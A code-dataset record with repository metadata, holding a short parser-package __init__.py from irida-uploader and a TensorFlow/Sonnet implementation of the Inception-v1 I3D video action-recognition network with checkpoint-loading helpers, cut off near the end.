iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 80
|
2019-01-29T14:54:26.000Z
|
2022-03-25T18:51:51.000Z
|
iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 9
|
2019-03-14T09:58:05.000Z
|
2022-01-06T20:14:45.000Z
|
from iridauploader.parsers.base_parser import BaseParser
from iridauploader.parsers.parsers import supported_parsers
from iridauploader.parsers.parsers import parser_factory
from iridauploader.parsers import exceptions
from iridauploader.parsers import common
| 43.333333
| 59
| 0.892308
| 31
| 260
| 7.387097
| 0.354839
| 0.371179
| 0.524017
| 0.270742
| 0.323144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 260
| 5
| 60
| 52
| 0.954167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db706b5658548649e430078889dd1e59f014c664
| 58,287
|
py
|
Python
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 23
|
2019-12-19T13:59:04.000Z
|
2021-09-16T08:59:17.000Z
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 19
|
2020-01-28T23:12:25.000Z
|
2022-02-10T00:40:42.000Z
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 8
|
2019-12-19T15:35:43.000Z
|
2021-10-08T21:11:39.000Z
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Inception-v1 Inflated 3D ConvNet used for Kinetics CVPR paper.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sonnet as snt
import tensorflow as tf
##### Wrapper Begins
# WEIGHTS_PATH = './models/weights/'
# import os
# MAIN_FOLDER = os.environ['AVA_DIR']
# WEIGHTS_PATH = MAIN_FOLDER + '/model_training/models/weights/'
def inference(input_image, is_training, num_classes, end_point='Logits', channel_mult=1.0, lateral=False):
dropout_keep = tf.cond(is_training, lambda: 0.2, lambda: 1.0)
processed_input = preprocess(input_image)
with tf.variable_scope('I3D_Model'):
if not lateral:
model = InceptionI3d(num_classes, spatial_squeeze=True, final_endpoint=end_point)
else:
model = LateralInceptionI3d(num_classes, spatial_squeeze=True, final_endpoint=end_point)
logits, endpoints = model(processed_input, is_training=is_training, dropout_keep_prob=dropout_keep, channel_mult=channel_mult)
return logits, endpoints
def preprocess(input_seq):
# crop_mean = np.load(WEIGHTS_PATH + 'c3d_crop_mean.npy')
# output_seq = input_seq - crop_mean
# scale between [-1,+1]
output_seq = input_seq / 128.0 - 1.0
# scale
# output_seq = output_seq / 255.0
return output_seq
def initialize_weights(sess, path_to_weights):
i3d_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='I3D_Model')
var_map = {}
for variable in i3d_var:
# if variable.name.endswith('w:0') or variable.name.endswith('beta:0'):
if 'Adam' not in variable.name:
if 'lateral' not in variable.name:
map_name = variable.name.replace(':0', '')
map_name = map_name.replace('I3D_Model', 'RGB')
var_map[map_name] = variable
rgb_saver = tf.train.Saver(var_list=var_map, reshape=True)
#path_to_weights = weights_path + 'i3d_rgb_imagenet/model.ckpt'
rgb_saver.restore(sess, path_to_weights)
print('Restored i3d head weights from %s ' % path_to_weights)
def initialize_tail(sess, weights_path):
# weights_path = MAIN_FOLDER + '/model_training/models/weights/'
# path_to_weights = weights_path + 'i3d_rgb_imagenet/model.ckpt'
## need var_map keys as this
# RGB/inception_i3d/Mixed_3c/Branch_2/Conv3d_0b_3x3/conv_3d/w
tail_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Tail_I3D')
var_map = {}
for variable in tail_vars:
# if variable.name.endswith('w:0') or variable.name.endswith('beta:0'):
if 'Adam' not in variable.name:
map_name = variable.name.replace(':0', '')
map_name = map_name.replace('Tail_I3D', 'RGB/inception_i3d')
var_map[map_name] = variable
if var_map.keys():
tail_saver = tf.train.Saver(var_list=var_map, reshape=True)
tail_saver.restore(sess, weights_path)
print('Restored i3d tail weights from %s ' % weights_path)
else:
print('Tail did not initialize anything')
def initialize_all_i3d_from_ckpt(sess, ckpt_file):
head_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='RGB/inception_i3d')
tail_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Tail_I3D')
cls_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='CLS_Logits')
var_list = head_vars + tail_vars + cls_vars
i3d_loader = tf.train.Saver(var_list=var_list)
i3d_loader.restore(sess, ckpt_file)
print('Restored I3D head - tail and CLS_Logits from ckpt %s' % ckpt_file)
###### Wrapper Ends
class Unit3D(snt.AbstractModule):
"""Basic unit containing Conv3D + BatchNorm + non-linearity."""
def __init__(self, output_channels,
kernel_shape=(1, 1, 1),
stride=(1, 1, 1),
activation_fn=tf.nn.relu,
use_batch_norm=True,
use_bias=False,
name='unit_3d'):
"""Initializes Unit3D module."""
super(Unit3D, self).__init__(name=name)
self._output_channels = output_channels
self._kernel_shape = kernel_shape
self._stride = stride
self._use_batch_norm = use_batch_norm
self._activation_fn = activation_fn
self._use_bias = use_bias
def _build(self, inputs, is_training):
"""Connects the module to inputs.
Args:
inputs: Inputs to the Unit3D component.
is_training: whether to use training mode for snt.BatchNorm (boolean).
Returns:
Outputs from the module.
"""
net = snt.Conv3D(output_channels=self._output_channels,
kernel_shape=self._kernel_shape,
stride=self._stride,
padding=snt.SAME,
use_bias=self._use_bias)(inputs)
if self._use_batch_norm:
bn = snt.BatchNorm()
#################### Warning batchnorm is hard coded to is_training=False #################
# net = bn(net, is_training=is_training, test_local_stats=False)
net = bn(net, is_training=False, test_local_stats=False)
if self._activation_fn is not None:
net = self._activation_fn(net)
return net
class InceptionI3d(snt.AbstractModule):
"""Inception-v1 I3D architecture.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
See also the Inception architecture, introduced in:
Going deeper with convolutions
Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Sermanet, Scott Reed,
Dragomir Anguelov, Dumitru Erhan, Vincent Vanhoucke, Andrew Rabinovich.
http://arxiv.org/pdf/1409.4842v1.pdf.
"""
# Endpoints of the model in order. During construction, all the endpoints up
# to a designated `final_endpoint` are returned in a dictionary as the
# second return value.
VALID_ENDPOINTS = (
'Conv3d_1a_7x7',
'MaxPool3d_2a_3x3',
'Conv3d_2b_1x1',
'Conv3d_2c_3x3',
'MaxPool3d_3a_3x3',
'Mixed_3b',
'Mixed_3c',
'MaxPool3d_4a_3x3',
'Mixed_4b',
'Mixed_4c',
'Mixed_4d',
'Mixed_4e',
'Mixed_4f',
'MaxPool3d_5a_2x2',
'Mixed_5b',
'Mixed_5c',
'Logits',
'Predictions',
)
def __init__(self, num_classes=400, spatial_squeeze=True,
final_endpoint='Logits', name='inception_i3d'):
"""Initializes I3D model instance.
Args:
num_classes: The number of outputs in the logit layer (default 400, which
matches the Kinetics dataset).
spatial_squeeze: Whether to squeeze the spatial dimensions for the logits
before returning (default True).
final_endpoint: The model contains many possible endpoints.
`final_endpoint` specifies the last endpoint for the model to be built
up to. In addition to the output at `final_endpoint`, all the outputs
at endpoints up to `final_endpoint` will also be returned, in a
dictionary. `final_endpoint` must be one of
InceptionI3d.VALID_ENDPOINTS (default 'Logits').
name: A string (optional). The name of this module.
Raises:
ValueError: if `final_endpoint` is not recognized.
"""
if final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % final_endpoint)
super(InceptionI3d, self).__init__(name=name)
self._num_classes = num_classes
self._spatial_squeeze = spatial_squeeze
self._final_endpoint = final_endpoint
def _build(self, inputs, is_training, dropout_keep_prob=1.0, channel_mult=1.0):
"""Connects the model to inputs.
Args:
inputs: Inputs to the model, which should have dimensions
`batch_size` x `num_frames` x 224 x 224 x `num_channels`.
is_training: whether to use training mode for snt.BatchNorm (boolean).
dropout_keep_prob: Probability for the tf.nn.dropout layer (float in
[0, 1)).
Returns:
A tuple consisting of:
1. Network output at location `self._final_endpoint`.
2. Dictionary containing all endpoints up to `self._final_endpoint`,
indexed by endpoint name.
Raises:
ValueError: if `self._final_endpoint` is not recognized.
"""
if self._final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % self._final_endpoint)
net = inputs
end_points = {}
end_point = 'Conv3d_1a_7x7'
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[7, 7, 7],
stride=[2, 2, 2], name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_2a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2b_1x1'
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2c_3x3'
net = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_3a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*96, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_4a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*208, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*224, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4d'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*256, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4e'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*144, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*288, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4f'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Logits'
with tf.variable_scope(end_point):
net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
strides=[1, 1, 1, 1, 1], padding=snt.VALID)
net = tf.nn.dropout(net, dropout_keep_prob)
logits = Unit3D(output_channels=self._num_classes,
kernel_shape=[1, 1, 1],
activation_fn=None,
use_batch_norm=False,
use_bias=True,
name='Conv3d_0c_1x1')(net, is_training=is_training)
if self._spatial_squeeze:
logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
averaged_logits = tf.reduce_mean(logits, axis=1)
end_points[end_point] = averaged_logits
if self._final_endpoint == end_point: return averaged_logits, end_points
end_point = 'Predictions'
predictions = tf.nn.softmax(averaged_logits)
end_points[end_point] = predictions
return predictions, end_points
###################################### tail ######################################
def Unit_custom_3D(output_channels,
kernel_shape=(1, 1, 1),
stride=(1, 1, 1),
activation_fn=tf.nn.relu,
use_batch_norm=True, # turn this false for nobn and use bias=true
use_bias=False,
name='unit_3d'):
return Unit3D(output_channels,
kernel_shape,
stride,
activation_fn,
use_batch_norm,
use_bias,
name)
def i3d_tail(input_feats, is_training, final_endpoint, channel_mult=1.0):
net = input_feats
end_points = {}
# end_point = 'Mixed_4f'
# with tf.variable_scope(end_point):
# with tf.variable_scope('Branch_0'):
# branch_0 = Unit_custom_3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# with tf.variable_scope('Branch_1'):
# branch_1 = Unit_custom_3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# branch_1 = Unit_custom_3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
# name='Conv3d_0b_3x3')(branch_1,
# is_training=is_training)
# with tf.variable_scope('Branch_2'):
# branch_2 = Unit_custom_3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
# name='Conv3d_0b_3x3')(branch_2,
# is_training=is_training)
# with tf.variable_scope('Branch_3'):
# branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
# strides=[1, 1, 1, 1, 1], padding=snt.SAME,
# name='MaxPool3d_0a_3x3')
# branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
# name='Conv3d_0b_1x1')(branch_3,
# is_training=is_training)
# net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
# end_points[end_point] = net
# # if self._final_endpoint == end_point: return net, end_points
# if final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit_custom_3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit_custom_3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit_custom_3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit_custom_3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit_custom_3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit_custom_3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit_custom_3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit_custom_3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
return net, end_points
# end_point = 'Logits'
# with tf.variable_scope(end_point):
# net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
# strides=[1, 1, 1, 1, 1], padding=snt.VALID)
# net = tf.nn.dropout(net, dropout_keep_prob)
# logits = Unit3D(output_channels=self._num_classes,
